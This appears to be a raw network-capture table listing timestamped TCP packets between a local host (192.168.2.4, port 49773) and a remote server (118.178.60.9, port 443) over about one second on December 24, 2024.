Dec 24, 2024 15:13:15.550046921 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.552424908 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.552474976 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.553422928 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.553504944 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.555785894 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.555841923 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.557826996 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.557873964 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.559374094 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.559442043 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.748671055 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.748760939 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.868117094 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.868314028 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.868746996 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.868813038 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.987731934 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.987782955 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.987801075 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.987812996 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.987827063 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.987835884 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.987859011 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.987865925 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.987884045 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.987915993 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.987965107 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.988010883 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.988179922 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.988233089 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.988234043 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.988255024 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.988266945 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.988291979 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.988303900 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.988306046 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.988317966 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.988353014 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.989094019 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.989135981 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.989137888 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.989145994 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.989197016 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.989790916 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.989840031 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.989851952 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.989860058 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.989881992 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.989882946 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.989896059 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.989908934 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.989934921 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.989937067 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.989954948 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.989960909 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.989986897 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.990015030 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.990727901 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.990776062 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.990780115 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.990787029 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.990813017 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.990816116 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.990827084 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.990828991 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.990839005 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.990856886 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.990888119 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.991600037 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.991664886 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.991666079 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.991677046 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.991733074 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.991760969 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.991816044 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.991821051 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.991832972 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.991866112 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.991880894 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.992527962 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.992587090 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.992774010 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.992818117 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.992824078 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.992831945 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.992858887 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.992866039 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.992878914 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.992882967 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.992908955 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.992948055 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.993818045 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.993872881 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.993875980 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.993889093 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.993916035 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.993940115 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.993974924 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.994023085 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.994507074 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.994558096 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.994703054 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.994748116 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.994752884 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.994760990 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.994786978 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.994790077 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.994803905 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.994808912 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.994837999 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.994860888 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.995460987 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.995508909 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.995678902 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.995723009 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.995724916 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.995733976 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.995754957 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.995759964 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.995795965 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.995800972 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.995826960 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.995831013 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.995853901 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.995861053 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.995896101 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.995899916 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.995908022 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.995934963 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.995953083 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.996707916 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.996761084 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.996769905 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.996777058 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.996783972 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.996803045 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.996834040 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.996851921 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.996859074 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.996900082 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.997648001 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.997703075 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.997710943 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.997736931 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.997762918 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.997770071 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.997786999 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.997848034 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.998584986 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.998636007 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.998792887 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.998850107 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.998979092 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.999027014 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.999053001 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.999059916 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.999073029 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.999075890 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.999100924 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.999123096 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.999339104 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.999372959 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.999423027 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.999432087 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.999489069 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.999677896 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.999718904 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.999743938 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.999754906 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.999771118 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.999804020 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.999847889 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.999897957 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.999898911 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:15.999907017 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:15.999980927 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.001054049 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.001107931 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.078123093 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.078192949 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.079344988 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.079408884 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.081430912 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.081482887 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.083394051 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.083444118 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.085500956 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.085545063 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.086657047 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.086709976 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.088757038 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.088808060 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.107526064 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.107578039 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.108122110 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.108175993 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.110413074 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.110460043 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.112198114 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.112281084 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.113351107 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.113399982 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.115483999 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.115533113 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.117542028 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.117599964 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.118760109 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.118814945 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.121159077 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.121211052 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.122934103 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.122986078 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.123801947 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.123863935 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.125427008 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.125473022 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.127108097 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.127154112 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.127988100 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.128041983 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.129502058 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.129559040 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.130858898 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.130909920 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.132523060 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.132569075 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.133640051 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.133688927 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.134673119 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.134720087 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.136373997 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.136423111 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.137784004 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.137840033 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.138773918 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.138827085 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.140672922 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.140722036 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.141931057 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.141978979 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.143676043 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.143727064 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.269901991 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.269958973 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.271519899 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.271564960 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.273154020 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.273202896 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.274152994 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.274210930 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.275613070 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.275669098 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.277287960 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.277340889 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.278162956 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.278217077 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.279834986 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.279882908 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.281420946 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.281480074 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.282320976 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.282373905 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.284059048 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.284113884 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.285618067 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.285671949 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.286607981 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.286664009 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.288167953 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.288218975 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.289747953 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.289822102 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.290688992 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.290743113 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.293632984 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.293685913 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.293940067 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.293998003 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.295938969 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.296010017 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.296493053 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.296551943 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.298118114 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.298187971 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.313044071 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.313098907 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.313107967 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.313160896 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.313231945 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.313287020 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.313473940 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.313507080 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.313515902 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.313523054 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.313549995 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.313560963 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.313739061 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.313797951 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.313925982 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.313977957 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.313983917 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.314028978 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.314035892 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.314044952 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.314075947 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.314106941 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.314542055 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.314595938 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.461812973 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.461899996 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.462738037 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.462793112 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.463480949 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.463536024 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.465123892 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.465178967 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.466794968 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.466852903 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.467642069 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.467705965 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.469552040 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.469607115 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.471330881 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.471385956 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.472666979 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.472728968 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.473843098 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.473900080 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.475033045 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.475087881 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.475939035 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.475991964 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.478075027 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.478132010 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.479207993 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.479260921 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.480453968 CET	443	49773	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:16.480509043 CET	49773	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:16.481887102 CET	443	49773	118.178.60.9	192.168.2.4
